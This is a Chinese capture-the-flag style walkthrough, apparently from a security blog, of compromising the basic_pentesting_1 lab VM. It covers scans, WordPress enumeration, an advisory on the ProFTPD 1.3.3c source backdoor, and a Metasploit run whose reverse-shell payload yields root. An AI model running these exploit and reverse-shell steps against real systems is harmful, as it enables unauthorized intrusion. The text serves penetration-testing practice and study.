操蛋人生系列-[每日一靶机]:Yakit基本使用+打靶basic_pentesting_1

每日一靶机-basic_pentesting_1

靶机目标IP：192.168.31.119

以练带学，补充细节，直击痛点，补救遗忘。

IcMl0x824

端口/指纹扫描-[1]

网络地址	端口	协议	服务指纹
192.168.31.119:22	22	tcp	linux_kernel/openssh[7.2p2]/ssh/ubuntu_linux
192.168.31.119:21	21	tcp	ftp/proftpd[1.3.3c]
192.168.31.119:80	80	tcp	apache[2.4.18]/http/http_server[2.4.18]/ubuntu/ubuntu_linux

综合目录扫描与爆破-[1]

URL	StatusCode	ContentLength	Title
http://192.168.31.119:80/secret	200	53358	My secret blog – Just another WordPress site
http://192.168.31.119:80/server-status	403	279	403 Forbidden
http://192.168.31.119:80/server%2Dstatus	403	279	403 Forbidden
http://192.168.31.119:80/server%2dstatus	403	279	403 Forbidden
http://192.168.31.119:80/	200	177
http://192.168.31.119:80/.htaccess	403	279	403 Forbidden
http://192.168.31.119:80/HxData/#HxData.mdb	400	301	400 Bad Request
http://192.168.31.119:80/HXMYDATABASE/#WY_OAdata2010.MDB	400	301	400 Bad Request
http://192.168.31.119:80/Database/%2523$%25%5ENwebCn_Site.mdb	400	306	400 Bad Request
http://192.168.31.119:80/Database/%23$%25%5ENwebCn_Site.mdb	400	301	400 Bad Request
http://192.168.31.119:80/Dataabc/Data#userabc.mdb	400	301	400 Bad Request
http://192.168.31.119:80/DataBase/#SoYiCi.MDB	400	301	400 Bad Request
http://192.168.31.119:80/Data#userabc.mdb	400	301	400 Bad Request
http://192.168.31.119:80/index.html	200	177
http://192.168.31.119:80/.htaccess	403	279	403 Forbidden
http://192.168.31.119:80/index.html	200	177
http://192.168.31.119:80/.htaccess	403	279	403 Forbidden
http://192.168.31.119:80/index.html	200	177

接下来的几个方向

1. SSH服务漏洞利用

2. apache[2.4.18]中间件漏洞利用

3. ftp/proftpd[1.3.3c]漏洞利用

4. WordPress漏洞利用

并非突破口

Dirsearch扫描http://192.168.31.119:80/secret目录，找到一些看似有用其实没啥用的东西，比如WordPress的登录页，文件包含页

[07:27:34] 301 -    0B  - /secret/index.php  ->  http://192.168.31.119/secret/
[07:27:35] 200 -   19KB - /secret/license.txt                               
[07:27:42] 200 -    7KB - /secret/readme.html                               
[07:27:50] 301 -  326B  - /secret/wp-admin  ->  http://192.168.31.119/secret/wp-admin/
[07:27:50] 200 -    0B  - /secret/wp-config.php                             
[07:27:50] 400 -    1B  - /secret/wp-admin/admin-ajax.php                   
[07:27:51] 500 -    3KB - /secret/wp-admin/setup-config.php                 
[07:27:51] 200 -    1KB - /secret/wp-admin/install.php
[07:27:51] 302 -    0B  - /secret/wp-admin/  ->  http://vtcsec/secret/wp-login.php?redirect_to=http%3A%2F%2F192.168.31.119%2Fsecret%2Fwp-admin%2F&reauth=1
[07:27:51] 200 -    0B  - /secret/wp-content/                               
[07:27:51] 301 -  328B  - /secret/wp-content  ->  http://192.168.31.119/secret/wp-content/
[07:27:51] 200 -   69B  - /secret/wp-content/plugins/akismet/akismet.php    
[07:27:51] 500 -    0B  - /secret/wp-content/plugins/hello.php              
[07:27:51] 200 -  989B  - /secret/wp-content/uploads/
[07:27:51] 200 -  799B  - /secret/wp-content/upgrade/                       
[07:27:51] 301 -  329B  - /secret/wp-includes  ->  http://192.168.31.119/secret/wp-includes/
[07:27:51] 200 -    0B  - /secret/wp-cron.php                               
[07:27:51] 302 -    0B  - /secret/wp-signup.php  ->  http://vtcsec/secret/wp-login.php?action=register
[07:27:51] 200 -    2KB - /secret/wp-login.php
[07:27:51] 500 -    0B  - /secret/wp-includes/rss-functions.php
[07:27:51] 200 -   40KB - /secret/wp-includes/                              
[07:27:51] 405 -   42B  - /secret/xmlrpc.php                                

wpscan扫描只有一个SSRF

可以说这全都是误导，如果一直在爆破登录页和一个一个文件的看显然是浪费很多时间

Apache %0A截断上传漏洞（CVE-2017-15715）：

漏洞原因：在2.4.0~2.4.29版本存在一个解析漏洞，在解析php时，1.phpx0A将按照php后缀进行解析，可以绕过上传黑名单

可是这个，你得有上传点啊，连后台都进不去，这有什么用。

突然想 msf里是有这个版本的渗透框架可以直接利用的

searchsploit proftpd

ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Executi | linux/remote/15662.txt

┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -p 15662.txt
  Exploit: ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution
      URL: https://www.exploit-db.com/exploits/15662
     Path: /usr/share/exploitdb/exploits/linux/remote/15662.txt
    Codes: OSVDB-69562
 Verified: True
File Type: unified diff output, ASCII text

== ProFTPD报告==

2010年11月28日，星期日，大约20:00 UTC

ProFTPD项目分发服务器被入侵。的

攻击者很可能在FTP守护进程中使用了未修补的安全问题

获取对服务器的访问权限，并使用他们的权限替换

ProFTPD 1.3.3c的源代码文件，该版本包含后门。

注意到未经授权对源代码的修改

由Jeroen Geilman转交给ProFTPD项目

星期三，12月1日，此后不久固定。

事实上，服务器充当ProFTPD的主要FTP站点

项目(ftp.proftpd.org)以及rsync分发服务器

(rsync.proftpd.org)对于所有的ProFTPD镜像服务器意味着任何人谁

从2010年11月28日的官方镜像下载ProFTPD 1.3.3c

到2010年12月02日很可能会受到这个问题的影响。

攻击者引入的后门允许未经身份验证的用户进入

对运行恶意修改版本的系统进行远程root访问

ProFTPD守护进程的。


强烈建议用户检查运行受影响代码的系统

危及安全性并编译/运行已知的良好版本的代码。

如果需要验证源文件的完整性，可以使用GPG签名

可在FTP服务器上下载，也可在ProFTPD的主页上下载:

http://www.proftpd.org/md5_pgp.html。

攻击者引入的后门允许未经身份验证的用户进入，对运行恶意修改版本的系统进行远程root访问

好家伙，上MSF！

msf6 > search proftpd 133c

Matching Modules
================
#  Name                                    Disclosure Date  Rank       Check  Description
-  ----                                    ---------------  ----       -----  -----------
0  exploit/unix/ftp/proftpd_133c_backdoor  2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > info

 Name: ProFTPD-1.3.3c Backdoor Command Execution
 Module: exploit/unix/ftp/proftpd_133c_backdoor
 Platform: Unix
Arch: cmd
 Privileged: Yes
License: Metasploit Framework License (BSD)
 Rank: Excellent
  Disclosed: 2010-12-02

Provided by:
  MC <[email protected]>
  darkharper2

Available targets:
  Id  Name
--  ----
0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
 ----    ---------------  --------  -----------
  RHOSTS  192.168.31.119   yes       The target host(s), see https://github.com/rapid7/metasploit
                                     -framework/wiki/Using-Metasploit
  RPORT   21               yes       The target port (TCP)

Payload information:
  Space: 2000
  Avoid: 0 characters

Description:
  This module exploits a malicious backdoor that was added to the 
  ProFTPD download archive. This backdoor was present in the 
  proftpd-1.3.3c.tar.[bz2|gz] archive between November 28th 2010 and 
  2nd December 2010.

References:
  OSVDB (69562)
  http://www.securityfocus.com/bid/45150


View the full module info with the info -d command.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show payloads

Compatible Payloads
===================

#  Name                                         Disclosure Date  Rank    Check  Description
-  ----                                        ---------------  ----    -----  -----------
0  payload/cmd/unix/bind_perl                   normal  No     Unix Command Shell, Bind TCP (via Perl)
1  payload/cmd/unix/bind_perl_ipv6              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
2  payload/cmd/unix/generic                     normal  No     Unix Command, Generic Command Execution
3  payload/cmd/unix/reverse                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
4  payload/cmd/unix/reverse_bash_telnet_ssl     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
5  payload/cmd/unix/reverse_perl                normal  No     Unix Command Shell, Reverse TCP (via Perl)
6  payload/cmd/unix/reverse_perl_ssl            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
7  payload/cmd/unix/reverse_ssl_double_telnet   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)


msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.31.119   yes       The target host(s), see https://github.com/rapid7/metasploi
                                      t-framework/wiki/Using-Metasploit
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.31.19
lhost => 192.168.31.19

注意 Platform: Unix，Arch: cmd，必须把payload设置为cmd/unix/reverse才能执行成功的，注意看信息加配置，MSF中info ，show payloads，

show targets，等命令要多加注意。

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > run

[*] Started reverse TCP double handler on 192.168.31.19:4444 
[*] 192.168.31.119:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 9L0XpQ4zfjAEMYcq;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "9L0XpQ4zfjAEMYcqrn"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.31.19:4444 -> 192.168.31.119:47388) at 2022-12-17 07:56:45 -0500

python -c 'import pty;pty.spawn("/bin/bash")'

root@vtcsec:/# whoami 
whoami
root

总结

信息收集始终是渗透过程中最重要的一个环节，有利的收集信息可以少走很多弯路，让测试过程也十分的流畅

原文始发于微信公众号（猫因的安全）：操蛋人生系列-[每日一靶机]:Yakit基本使用+打靶basic_pentesting_1